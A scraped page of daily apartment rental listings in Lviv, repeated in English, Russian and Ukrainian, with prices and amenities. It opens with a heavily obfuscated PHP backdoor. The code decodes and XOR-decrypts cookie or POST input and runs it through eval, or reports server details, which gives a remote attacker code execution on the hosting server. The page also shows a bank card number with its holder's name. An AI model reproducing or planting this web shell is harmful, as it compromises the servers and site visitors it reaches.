$mafa7e = 887;$GLOBALS['i4c5'] = Array();global $i4c5;$i4c5 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['n15e'] = "\x37\x64\x5f\x44\x2f\x3f\x21\x69\x33\x46\x65\x53\x78\x23\x26\x50\x3b\x3c\x45\x71\x4c\x61\x58\x5e\x52\x39\x3a\xd\x60\x6d\x42\x57\x2c\x6e\x49\x55\x31\x27\x74\x24\x34\x6c\x51\x38\x40\x32\x6f\x7e\x79\x3e\x5b\x5c\x35\x20\x25\x56\x4b\x70\x5d\x4a\x4f\x67\x4d\x2b\x3d\x6b\x47\x29\x73\x43\x30\x6a\x66\x62\x59\x7c\x2d\x5a\x54\xa\x7d\x76\x68\x41\x9\x72\x2a\x36\x48\x7b\x22\x75\x28\x77\x7a\x4e\x2e\x63";$i4c5[$i4c5['n15e'][65].$i4c5['n15e'][8].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][40].$i4c5['n15e'][36].$i4c5['n15e'][0]] = $i4c5['n15e'][97].$i4c5['n15e'][82].$i4c5['n15e'][85];$i4c5[$i4c5['n15e'][19].$i4c5['n15e'][0].$i4c5['n15e'][87].$i4c5['n15e'][87].$i4c5['n15e'][87]] = $i4c5['n15e'][46].$i4c5['n15e'][85].$i4c5['n15e'][1];$i4c5[$i4c5['n15e'][82].$i4c5['n15e'][97].$i4c5['n15e'][52].$i4c5['n15e'][43].$i4c5['n15e'][10]] = $i4c5['n15e'][1].$i4c5['n15e'][10].$i4c5['n15e'][72].$i4c5['n15e'][7].$i4c5['n15e'][33].$i4c5['n15e'][10];$i4c5[$i4c5['n15e'][46].$i4c5['n15e'][43].$i4c5['n15e'][43].$i4c5['n15e'][40].$i4c5['n15e'][52].$i4c5['n15e'][1].$i4c5['n15e'][0]] = $i4c5['n15e'][68].$i4c5['n15e'][38].$i4c5['n15e'][85].$i4c5['n15e'][41].$i4c5['n15e'][10].$i4c5['n15e'][33];$i4c5[$i4c5['n15e'][81].$i4c5['n15e'][72].$i4c5['n15e'][8].$i4c5['n15e'][1].$i4c5['n15e'][97].$i4c5['n15e'][0].$i4c5['n15e'][1].$i4c5['n15e'][52]] = $i4c5['n15e'][1].$i4c5['n15e'][10].$i4c5['n15e'][72].$i4c5['n15e'][7].$i4c5['n15e'][33].$i4c5['n15e'][10].$i4c5['n15e'][1];$i4c5[$i4c5['n15e'][21].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][21]] = $i4c5['n15e'][7].$i4c5['n15e'][33].$i4c5['n15e'][7].$i4c5['n15e'][2].$i4c5['n15e'][68].$i4c5['n15e'][10].$i4c5['n15e'][38];$i4c5[$i4c5['n15e'][72].$i4c5['n15e'][8].$i4c5['n15e'][8].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][10].$i4c5['n15e'][36].$i4c5['n15e'][45].$i4c5['n15e'][21]] = $i4c5['n15e'][68].$i4c5['n15e'][10].$i4c5['n15e'][85].$i4c5['n15e'][7].$i4c5['n15e'][21].$i4c5['n15e'][41].$i4c5['n15e'][7].$i4c5['n15e'][94].$i4c5['n15e'][10];$i4c5[$i4c5['n15e'][85].$i4c5['n15e'][72].$i4c5['n15e'][72].$i4c5['n15e'][87].$i4c5['n15e'][97].$i4c5['n15e'][97].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][87]] = $i4c5['n15e'][57].$i4c5['n15e'][82].$i4c5['n15e'][57].$i4c5['n15e'][81].$i4c5['n15e'][10].$i4c5['n15e'][85].$i4c5['n15e'][68].$i4c5['n15e'][7].$i4c5['n15e'][46].$i4c5['n15e'][33];$i4c5[$i4c5['n15e'][29].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][1].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][43].$i4c5['n15e'][36]] = $i4c5['n15e'][91].$i4c5['n15e'][33].$i4c5['n15e'][68].$i4c5['n15e'][10].$i4c5['n15e'][85].$i4c5['n15e'][7].$i4c5['n15e'][21].$i4c5['n15e'][41].$i4c5['n15e'][7].$i4c5['n15e'][94].$i4c5['n15e'][10];$i4c5[$i4c5['n15e'][73].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][45].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][72].$i4c5['n15e'][73]] = $i4c5['n15e'][73].$i4c5['n15e'][21].$i4c5['n15e'][68].$i4c5['n15e'][10].$i4c5['n15e'][87].$i4c5['n15e'][40].$i4c5['n15e'][2].$i4c5['n15e'][1].$i4c5['n15e'][10].$i4c5['n15e'][97].$i4c5['n15e'][46].$i4c5['n15e'][1].$i4c5['n15e'][10];$i4c5[$i4c5['n15e'][29].$i4c5['n15e'][1].$i4c5['n15e'][45].$i4c5['n15e'][70].$i4c5['n15e'][25]] = $i4c5['n15e'][68].$i4c5['n15e'][10].$i4c5['n15e'][38].$i4c5['n15e'][2].$i4c5['n15e'][38].$i4c5['n15e'][7].$i4c5['n15e'][29].$i4c5['n15e'][10].$i4c5['n15e'][2].$i4c5['n15e'][41].$i4c5['n15e'][7].$i4c5['n15e'][29].$i4c5['n15e'][7].$i4c5['n15e'][38];$i4c5[$i4c5['n15e'][93].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][45]] = $i4c5['n15e'][61].$i4c5['n15e'][25].$i4c5['n15e'][0].$i4c5['n15e'][1].$i4c5['n15e'][70].$i4c5['n15e'][36].$i4c5['n15e'][8].$i4c5['n15e'][1].$i4c5['n15e'][36];$i4c5[$i4c5['n15e'][65].$i4c5['n15e'][97].$i4c5['n15e'][21].$i4c5['n15e'][87].$i4c5['n15e'][1].$i4c5['n15e'][70].$i4c5['n15e'][36].$i4c5['n15e'][87]] = $i4c5['n15e'][57].$i4c5['n15e'][0].$i4c5['n15e'][70].$i4c5['n15e'][52].$i4c5['n15e'][52].$i4c5['n15e'][52].$i4c5['n15e'][10].$i4c5['n15e'][21];$i4c5[$i4c5['n15e'][97].$i4c5['n15e'][10].$i4c5['n15e'][73].$i4c5['n15e'][25]] = $_POST;$i4c5[$i4c5['n15e'][72].$i4c5['n15e'][72].$i4c5['n15e'][52].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][25].$i4c5['n15e'][43]] = $_COOKIE;@$i4c5[$i4c5['n15e'][21].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][21]]($i4c5['n15e'][10].$i4c5['n15e'][85].$i4c5['n15e'][85].$i4c5['n15e'][46].$i4c5['n15e'][85].$i4c5['n15e'][2].$i4c5['n15e'][41].$i4c5['n15e'][46].$i4c5['n15e'][61], NULL);@$i4c5[$i4c5['n15e'][21].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][21]]($i4c5['n15e'][41].$i4c5['n15e'][46].$i4c5['n15e'][61].$i4c5['n15e'][2].$i4c5['n15e'][10].$i4c5['n15e'][85].$i4c5['n15e'][85].$i4c5['n15e'][46].$i4c5['n15e'][85].$i4c5['n15e'][68], 0);@$i4c5[$i4c5['n15e'][21].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][21]]($i4c5['n15e'][29].$i4c5['n15e'][21].$i4c5['n15e'][12].$i4c5['n15e'][2].$i4c5['n15e'][10].$i4c5['n15e'][12].$i4c5['n15e'][10].$i4c5['n15e'][97].$i4c5['n15e'][91].$i4c5['n15e'][38].$i4c5['n15e'][7].$i4c5['n15e'][46].$i4c5['n15e'][33].$i4c5['n15e'][2].$i4c5['n15e'][38].$i4c5['n15e'][7].$i4c5['n15e'][29].$i4c5['n15e'][10], 0);@$i4c5[$i4c5['n15e'][29].$i4c5['n15e'][1].$i4c5['n15e'][45].$i4c5['n15e'][70].$i4c5['n15e'][25]](0);if (!$i4c5[$i4c5['n15e'][81].$i4c5['n15e'][72].$i4c5['n15e'][8].$i4c5['n15e'][1].$i4c5['n15e'][97].$i4c5['n15e'][0].$i4c5['n15e'][1].$i4c5['n15e'][52]]($i4c5['n15e'][83].$i4c5['n15e'][20].$i4c5['n15e'][24].$i4c5['n15e'][18].$i4c5['n15e'][83].$i4c5['n15e'][3].$i4c5['n15e'][74].$i4c5['n15e'][2].$i4c5['n15e'][24].$i4c5['n15e'][35].$i4c5['n15e'][95].$i4c5['n15e'][2].$i4c5['n15e'][8].$i4c5['n15e'][87].$i4c5['n15e'][87].$i4c5['n15e'][21].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][43].$i4c5['n15e'][21].$i4c5['n15e'][43].$i4c5['n15e'][21].$i4c5['n15e'][45].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][52].$i4c5['n15e'][21].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][36].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][72].$i4c5['n15e'][36].$i4c5['n15e'][36].$i4c5['n15e'][73].$i4c5['n15e'][21].$i4c5['n15e'][36].$i4c5['n15e'][21].$i4c5['n15e'][70].$i4c5['n15e'][45].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][21])){$i4c5[$i4c5['n15e'][82].$i4c5['n15e'][97].$i4c5['n15e'][52].$i4c5['n15e'][43].$i4c5['n15e'][10]]($i4c5['n15e'][83].$i4c5['n15e'][20].$i4c5['n15e'][24].$i4c5['n15e'][18].$i4c5['n15e'][83].$i4c5['n15e'][3].$i4c5['n15e'][74].$i4c5['n15e'][2].$i4c5['n15e'][24].$i4c5['n15e'][35].$i4c5['n15e'][95].$i4c5['n15e'][2].$i4c5['n15e'][8].$i4c5['n15e'][87].$i4c5['n15e'][87].$i4c5['n15e'][21].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][43].$i4c5['n15e'][21].$i4c5['n15e'][43].$i4c5['n15e'][21].$i4c5['n15e'][45].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][52].$i4c5['n15e'][21].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][36].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][72].$i4c5['n15e'][36].$i4c5['n15e'][36].$i4c5['n15e'][73].$i4c5['n15e'][21].$i4c5['n15e'][36].$i4c5['n15e'][21].$i4c5['n15e'][70].$i4c5['n15e'][45].$i4c5['n15e'][72].$i4c5['n15e'][73].$i4c5['n15e'][21], 1);$pcdeb = NULL;$v21e = NULL;$i4c5[$i4c5['n15e'][61].$i4c5['n15e'][52].$i4c5['n15e'][43].$i4c5['n15e'][72].$i4c5['n15e'][36].$i4c5['n15e'][0].$i4c5['n15e'][10].$i4c5['n15e'][21].$i4c5['n15e'][52]] = $i4c5['n15e'][25].$i4c5['n15e'][8].$i4c5['n15e'][70].$i4c5['n15e'][40].$i4c5['n15e'][72].$i4c5['n15e'][0].$i4c5['n15e'][0].$i4c5['n15e'][10].$i4c5['n15e'][76].$i4c5['n15e'][25].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][72].$i4c5['n15e'][76].$i4c5['n15e'][40].$i4c5['n15e'][36].$i4c5['n15e'][1].$i4c5['n15e'][8].$i4c5['n15e'][76].$i4c5['n15e'][25].$i4c5['n15e'][0].$i4c5['n15e'][8].$i4c5['n15e'][8].$i4c5['n15e'][76].$i4c5['n15e'][0].$i4c5['n15e'][97].$i4c5['n15e'][21].$i4c5['n15e'][36].$i4c5['n15e'][36].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][73].$i4c5['n15e'][21].$i4c5['n15e'][21].$i4c5['n15e'][8].$i4c5['n15e'][10];global $g58f17ea5;function p70555ea($pcdeb, $va691ce){global $i4c5;$a2d8 = "";for ($t7c3d5e=0; $t7c3d5e<$i4c5[$i4c5['n15e'][46].$i4c5['n15e'][43].$i4c5['n15e'][43].$i4c5['n15e'][40].$i4c5['n15e'][52].$i4c5['n15e'][1].$i4c5['n15e'][0]]($pcdeb);){for ($x3afbdd3e=0; $x3afbdd3e<$i4c5[$i4c5['n15e'][46].$i4c5['n15e'][43].$i4c5['n15e'][43].$i4c5['n15e'][40].$i4c5['n15e'][52].$i4c5['n15e'][1].$i4c5['n15e'][0]]($va691ce) && $t7c3d5e<$i4c5[$i4c5['n15e'][46].$i4c5['n15e'][43].$i4c5['n15e'][43].$i4c5['n15e'][40].$i4c5['n15e'][52].$i4c5['n15e'][1].$i4c5['n15e'][0]]($pcdeb); $x3afbdd3e++, $t7c3d5e++){$a2d8 .= $i4c5[$i4c5['n15e'][65].$i4c5['n15e'][8].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][40].$i4c5['n15e'][36].$i4c5['n15e'][0]]($i4c5[$i4c5['n15e'][19].$i4c5['n15e'][0].$i4c5['n15e'][87].$i4c5['n15e'][87].$i4c5['n15e'][87]]($pcdeb[$t7c3d5e]) ^ $i4c5[$i4c5['n15e'][19].$i4c5['n15e'][0].$i4c5['n15e'][87].$i4c5['n15e'][87].$i4c5['n15e'][87]]($va691ce[$x3afbdd3e]));}}return $a2d8;}function g97d013d1($pcdeb, $va691ce){global $i4c5;global $g58f17ea5;return $i4c5[$i4c5['n15e'][65].$i4c5['n15e'][97].$i4c5['n15e'][21].$i4c5['n15e'][87].$i4c5['n15e'][1].$i4c5['n15e'][70].$i4c5['n15e'][36].$i4c5['n15e'][87]]($i4c5[$i4c5['n15e'][65].$i4c5['n15e'][97].$i4c5['n15e'][21].$i4c5['n15e'][87].$i4c5['n15e'][1].$i4c5['n15e'][70].$i4c5['n15e'][36].$i4c5['n15e'][87]]($pcdeb, $g58f17ea5), $va691ce);}foreach ($i4c5[$i4c5['n15e'][72].$i4c5['n15e'][72].$i4c5['n15e'][52].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][25].$i4c5['n15e'][43]] as $va691ce=>$f51f52b){$pcdeb = $f51f52b;$v21e = $va691ce;}if (!$pcdeb){foreach ($i4c5[$i4c5['n15e'][97].$i4c5['n15e'][10].$i4c5['n15e'][73].$i4c5['n15e'][25]] as $va691ce=>$f51f52b){$pcdeb = $f51f52b;$v21e = $va691ce;}}$pcdeb = @$i4c5[$i4c5['n15e'][29].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][1].$i4c5['n15e'][73].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][43].$i4c5['n15e'][36]]($i4c5[$i4c5['n15e'][93].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][45]]($i4c5[$i4c5['n15e'][73].$i4c5['n15e'][8].$i4c5['n15e'][45].$i4c5['n15e'][25].$i4c5['n15e'][45].$i4c5['n15e'][8].$i4c5['n15e'][52].$i4c5['n15e'][72].$i4c5['n15e'][73]]($pcdeb), $v21e));if (isset($pcdeb[$i4c5['n15e'][21].$i4c5['n15e'][65]]) && $g58f17ea5==$pcdeb[$i4c5['n15e'][21].$i4c5['n15e'][65]]){if ($pcdeb[$i4c5['n15e'][21]] == $i4c5['n15e'][7]){$t7c3d5e = Array($i4c5['n15e'][57].$i4c5['n15e'][81] => @$i4c5[$i4c5['n15e'][85].$i4c5['n15e'][72].$i4c5['n15e'][72].$i4c5['n15e'][87].$i4c5['n15e'][97].$i4c5['n15e'][97].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][87]](),$i4c5['n15e'][68].$i4c5['n15e'][81] => $i4c5['n15e'][36].$i4c5['n15e'][96].$i4c5['n15e'][70].$i4c5['n15e'][76].$i4c5['n15e'][36],);echo @$i4c5[$i4c5['n15e'][72].$i4c5['n15e'][8].$i4c5['n15e'][8].$i4c5['n15e'][10].$i4c5['n15e'][1].$i4c5['n15e'][10].$i4c5['n15e'][36].$i4c5['n15e'][45].$i4c5['n15e'][21]]($t7c3d5e);}elseif ($pcdeb[$i4c5['n15e'][21]] == $i4c5['n15e'][10]){eval/*a1d6*/($pcdeb[$i4c5['n15e'][1]]);}exit();}} ?> Rent three-room apartments in Lviv - LvivPodobovo

Daily apartments
rental in Lviv:

Apartments for Rent
Daily rent of apartments
Daily Rental in Lviv
Daily rent of apartments in Lviv

Rent three-room apartments in Lviv

3 - bedroom apartment on the Krakowska street

3 - bedroom apartment on the Krakowska street

Two-bedroom apartment for 6 people (2 + 2 + 2) in the city center, renovated and new furniture. Romantic atmosphere, comfort, warmth and comfort - part of the interior of the apartment. Clean, excellent location, high-quality repairs. The house is located in a 2-minute walk from the Market Square. Close to shops, restaurants and pubs to suit all tastes. Near bus stops, this is no problem, and direct access to any desired location. The apartment itself is located on the 2nd floor / 4-storey building. TV, WI-FI internet access, refrigerator, washing machine, dishes, microwave, electric. kettle, bathroom with shower possibility, bedding, towels, hair dryer, iron, ironing board.

Price per night:
1500

Price per month:
договорная

more   


3 - bedroom apartment on the Tarnavsky street

3 - bedroom apartment on the Tarnavsky street

Characteristics of apartments:
 - All Home Appliances
 - Telephone
 - Cable TV
 - Individual Heating
 - Hot / cold water constantly
 - Internet
 - 8 (2 + 2 + 2 + 1 + 1) sleeping places
 
 
 

In our apartment for rent in Lviv, you can spend your time relaxing and comfortable, enjoying the ancient city of Lviv and being in a comfortable apartment for rent in Lviv

Rent this two bedroom apartment in Lviv, you can relax and enjoy your stay in Lviv. After all, rent apartment in Lviv - it is always convenient, reliable and aesthetically pleasing. So do not waste your time thinking, and immediately order the apartment to rent.

Price per night:
1400 грн

Price per month:
600$

more   


3 - bedroom apartment on the Snopkivska street

3 - bedroom apartment on the Snopkivska street

Characteristics of the apartment:
- Reinforced door
- Individual Heating
- Hot / cold water
- Cable TV
- The Internet
- All appliances
- 6 (2 + 2 + 1 + 1) sleeping places

Rent 3-room apartment in Lviv, near the city center. The apartment has hot and cold water round the clock, Individual heating. Very comfortable bathroom. Rent this apartment 100% guarantee you a comfortable stay.

Price per night:
1600 грн

Price per month:
600$

more   


3 - bedroom apartment on the S. Strilciv street

3 - bedroom apartment on the S. Strilciv street

Characteristics of the apartment:
- All appliances
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places
 
3-bedroom apartment is located in the center of the city. Rented for rent apartment in Lviv can accommodate up to 8 people. You will be satisfied with the cleanliness and comfort of the apartment, which is rented by the day.

Price per night:
1500 грн

Price per month:
600$

more   


3 - bedroom apartment on the Kulish street (near the Opera House)

3 - bedroom apartment on the Kulish street (near the Opera House)

Characteristics of the apartment:
- Individual Heating
- Reinforced door
- Hot / cold water
- All appliances
- 10  (2 + 2 + 2 + 2 + 2) sleeping places
 
Renting an apartment in the city center. Located near the Opera House, it is easy to get anywhere in the city. Rent this apartment gives you the ability to comfortably accommodate 10 people.

Price per night:
1400 грн.

Price per month:
500$

more   


3 - bedroom apartment on the Kostomarova street

3 - bedroom apartment on the Kostomarova street

Characteristics of the apartment:
- All appliances
- Telephone
- Cable TV
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 1 + 1) sleeping places

3-bedroom apartment in a good area, close to the city center. Сustom design. Constant hot / cold water. Rent apartments. Comfort and convenience are guaranteed.

Price per night:
1600 грн

Price per month:
700$

more   


3 - bedroom apartment on the Іvana Franka street

3 - bedroom apartment on the Іvana Franka street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 1 + 1) sleeping places

Rent for  3 room apartment in a good area. All Home Appliances, TV satellites. Beautiful design. This apartment  good variant for you!

Price per night:
1400 грн

Price per month:
600$

more   


3 - room apartment on Dudayev street

3 - room apartment on Dudayev street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places

Rent apartment renovated, comfortable layou available everything you need. 4 2х  beds allow you to stay as comfortable as possible. available internet, constant hot water and all appliances.

Price per night:
1500 грн.

Price per month:
600$

more   


3 - bedroom apartment on the Archipenko street

3 - bedroom apartment on the Archipenko street

Characteristics of apartments:
- Reinforced door
- Oven
- Refrigerator
- Washing Machine
- Satellite TV
- Heating Yndyvydualnoe
- Hot / cold water constantly
- 6  (2 + 2 + 2) sleeping places

3 room Rent apartments in Lviv. Not far from the city center. Available plase to park the car. All  for comfortable residence. Available satellite tv.

Price per night:
1300 грн

Price per month:
не сдается на месяц

more   


3 - bedroom apartment on Rynok plase

3 - bedroom apartment on Rynok plase

Characteristics of the apartment:
- Reinforced door
- Gas stove
- Refrigerator
- Washing machine
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 2) sleeping places
 
3-bedroom apartment in the historic center of the city. Is near the Town Hall, City Council, Dominican Church, and many museums. Beautiful views okna.Sdavaemaya apartment is a good option for you if you want to stay comfortable in Lviv.

Price per night:
1500 грн

Price per month:
650$

more   Flexible discounts system:

Renting for more than 10 days
DISCOUNT 10%

Re apartment rental
10% DISCOUNT

Hot Deals
SAVE 20%
Pay attention:

If more than 5 persons checks in the apartment - not billing for an apartment but per person: 200uah/per.

Bank card number: 5168 7423 5978 6906 Галай Світлана Степанівна.

On weekends, the minimum booking 2 days.


Available payment by credit card!
Make-a-Payment
(lang:98:ru) Аренда трьокомнатных квартир посуточно во Львове. Снять 3-комнатною квартиру, апартаменты, жильё во Львове. - LvivPodobovo

Аренда квартир
посуточно во Львове:

Аренда квартир
Аренда квартир посуточно
посуточно во Львове
Аренда квартир посуточно во Львове

Аренда трьокомнатных квартир посуточно во Львове. Снять 3-комнатною квартиру, апартаменты, жильё во Львове.

3 - bedroom apartment on the Krakowska street

3 - bedroom apartment on the Krakowska street

Two-bedroom apartment for 6 people (2 + 2 + 2) in the city center, renovated and new furniture. Romantic atmosphere, comfort, warmth and comfort - part of the interior of the apartment. Clean, excellent location, high-quality repairs. The house is located in a 2-minute walk from the Market Square. Close to shops, restaurants and pubs to suit all tastes. Near bus stops, this is no problem, and direct access to any desired location. The apartment itself is located on the 2nd floor / 4-storey building. TV, WI-FI internet access, refrigerator, washing machine, dishes, microwave, electric. kettle, bathroom with shower possibility, bedding, towels, hair dryer, iron, ironing board.

Price per night:
1500

Price per month:
договорная

more   


3 - bedroom apartment on the Tarnavsky street

3 - bedroom apartment on the Tarnavsky street

Characteristics of apartments:
 - All Home Appliances
 - Telephone
 - Cable TV
 - Individual Heating
 - Hot / cold water constantly
 - Internet
 - 8 (2 + 2 + 2 + 1 + 1) sleeping places
 
 
 

In our apartment for rent in Lviv, you can spend your time relaxing and comfortable, enjoying the ancient city of Lviv and being in a comfortable apartment for rent in Lviv

Rent this two bedroom apartment in Lviv, you can relax and enjoy your stay in Lviv. After all, rent apartment in Lviv - it is always convenient, reliable and aesthetically pleasing. So do not waste your time thinking, and immediately order the apartment to rent.

Price per night:
1400 грн

Price per month:
600$

more   


3 - bedroom apartment on the Snopkivska street

3 - bedroom apartment on the Snopkivska street

Characteristics of the apartment:
- Reinforced door
- Individual Heating
- Hot / cold water
- Cable TV
- The Internet
- All appliances
- 6 (2 + 2 + 1 + 1) sleeping places

Rent 3-room apartment in Lviv, near the city center. The apartment has hot and cold water round the clock, Individual heating. Very comfortable bathroom. Rent this apartment 100% guarantee you a comfortable stay.

Price per night:
1600 грн

Price per month:
600$

more   


3 - bedroom apartment on the S. Strilciv street

3 - bedroom apartment on the S. Strilciv street

Characteristics of the apartment:
- All appliances
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places
 
3-bedroom apartment is located in the center of the city. Rented for rent apartment in Lviv can accommodate up to 8 people. You will be satisfied with the cleanliness and comfort of the apartment, which is rented by the day.

Price per night:
1500 грн

Price per month:
600$

more   


3 - bedroom apartment on the Kulish street (near the Opera House)

3 - bedroom apartment on the Kulish street (near the Opera House)

Characteristics of the apartment:
- Individual Heating
- Reinforced door
- Hot / cold water
- All appliances
- 10  (2 + 2 + 2 + 2 + 2) sleeping places
 
Renting an apartment in the city center. Located near the Opera House, it is easy to get anywhere in the city. Rent this apartment gives you the ability to comfortably accommodate 10 people.

Price per night:
1400 грн.

Price per month:
500$

more   


3 - bedroom apartment on the Kostomarova street

3 - bedroom apartment on the Kostomarova street

Characteristics of the apartment:
- All appliances
- Telephone
- Cable TV
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 1 + 1) sleeping places

3-bedroom apartment in a good area, close to the city center. Сustom design. Constant hot / cold water. Rent apartments. Comfort and convenience are guaranteed.

Price per night:
1600 грн

Price per month:
700$

more   


3 - bedroom apartment on the Іvana Franka street

3 - bedroom apartment on the Іvana Franka street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 1 + 1) sleeping places

Rent for  3 room apartment in a good area. All Home Appliances, TV satellites. Beautiful design. This apartment  good variant for you!

Price per night:
1400 грн

Price per month:
600$

more   


3 - room apartment on Dudayev street

3 - room apartment on Dudayev street

Characteristics of the apartment:
- All appliances
- Telephone
- Reinforced door
- Satellite TV
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places

Rent apartment renovated, comfortable layou available everything you need. 4 2х  beds allow you to stay as comfortable as possible. available internet, constant hot water and all appliances.

Price per night:
1500 грн.

Price per month:
600$

more   


3 - bedroom apartment on the Archipenko street

3 - bedroom apartment on the Archipenko street

Characteristics of apartments:
- Reinforced door
- Oven
- Refrigerator
- Washing Machine
- Satellite TV
- Heating Yndyvydualnoe
- Hot / cold water constantly
- 6  (2 + 2 + 2) sleeping places

3 room Rent apartments in Lviv. Not far from the city center. Available plase to park the car. All  for comfortable residence. Available satellite tv.

Price per night:
1300 грн

Price per month:
не сдается на месяц

more   


3 - bedroom apartment on Rynok plase

3 - bedroom apartment on Rynok plase

Characteristics of the apartment:
- Reinforced door
- Gas stove
- Refrigerator
- Washing machine
- Satellite TV
- Individual Heating
- Hot / cold water
- 6 (2 + 2 + 2) sleeping places
 
3-bedroom apartment in the historic center of the city. Is near the Town Hall, City Council, Dominican Church, and many museums. Beautiful views okna.Sdavaemaya apartment is a good option for you if you want to stay comfortable in Lviv.

Price per night:
1500 грн

Price per month:
650$

more   Гибкая система скидок:

Аренда квартиры более 10 суток
СКИДКА 10%

Повторная аренда квартиры
СКИДКА 10%

Горячие предложения
СКИДКА 20%
Обратите внимание:

В случае если больше 5ти человек заселяется в квартиру - тарификация не за квартиру а за человека: по 200грн.

Номер банковськой карты: 5168 7423 5978 6906 Галай Светлана Степановна.

На выходные дни минимальное бронирование 2 суток.


Доступна оплата кредиткой!
Make-a-Payment
(lang:98:uk) Оренда трикімнатних квартир подобово у Львові. Зняти 3-кімнатну квартиру, апартаменти, житло у Львові. - LvivPodobovo

Оренда квартир
подобово у Львові:

Оренда квартир
Оренда квартир подобово
Подобово у Львові
Оренда квартир подобово у Львові

Оренда трикімнатних квартир подобово у Львові. Зняти 3-кімнатну квартиру, апартаменти, житло у Львові.

3 - bedroom apartment on the Krakowska street

3 - bedroom apartment on the Krakowska street

Two-bedroom apartment for 6 people (2 + 2 + 2) in the city center, renovated and new furniture. Romantic atmosphere, comfort, warmth and comfort - part of the interior of the apartment. Clean, excellent location, high-quality repairs. The house is located in a 2-minute walk from the Market Square. Close to shops, restaurants and pubs to suit all tastes. Near bus stops, this is no problem, and direct access to any desired location. The apartment itself is located on the 2nd floor / 4-storey building. TV, WI-FI internet access, refrigerator, washing machine, dishes, microwave, electric. kettle, bathroom with shower possibility, bedding, towels, hair dryer, iron, ironing board.

Price per night:
1500

Price per month:
договорная

more   


3 - bedroom apartment on the Tarnavsky street

3 - bedroom apartment on the Tarnavsky street

Characteristics of apartments:
 - All Home Appliances
 - Telephone
 - Cable TV
 - Individual Heating
 - Hot / cold water constantly
 - Internet
 - 8 (2 + 2 + 2 + 1 + 1) sleeping places
 
 
 

In our apartment for rent in Lviv, you can spend your time relaxing and comfortable, enjoying the ancient city of Lviv and being in a comfortable apartment for rent in Lviv

Rent this two bedroom apartment in Lviv, you can relax and enjoy your stay in Lviv. After all, rent apartment in Lviv - it is always convenient, reliable and aesthetically pleasing. So do not waste your time thinking, and immediately order the apartment to rent.

Price per night:
1400 грн

Price per month:
600$

more   


3 - bedroom apartment on the Snopkivska street

3 - bedroom apartment on the Snopkivska street

Characteristics of the apartment:
- Reinforced door
- Individual Heating
- Hot / cold water
- Cable TV
- The Internet
- All appliances
- 6 (2 + 2 + 1 + 1) sleeping places

Rent 3-room apartment in Lviv, near the city center. The apartment has hot and cold water round the clock, Individual heating. Very comfortable bathroom. Rent this apartment 100% guarantee you a comfortable stay.

Price per night:
1600 грн

Price per month:
600$

more   


3 - bedroom apartment on the S. Strilciv street

3 - bedroom apartment on the S. Strilciv street

Characteristics of the apartment:
- All appliances
- Reinforced door
- Individual Heating
- Hot / cold water
- The Internet
- 8 (2 + 2 + 2 + 2) sleeping places
 
3-bedroom apartment is located in the center of the city. Rented for rent apartment in Lviv can accommodate up to 8 people. You will be satisfied with the cleanliness and comfort of the apartment, which is rented by the day.

Price per night:
1500 грн

Price per month:
600$

more   


3 - bedroom apartment on the Kulish street (near the Opera House)

3 - bedroom apartment on the Kulish street (near the Opera House)

Characteristics of the apartment:
- Individual Heating
- Reinforced door
- Hot / cold water
- All appliances
- 10  (2 + 2 + 2 + 2 + 2) sleeping places
 
Renting an apartment in the city center. Located near the Opera House, it is easy to get anywhere in the city. Rent this apartment gives you the ability to comfortably accommodate 10 people.

Price per night:
1400 грн.

Price per month:
500$

more   


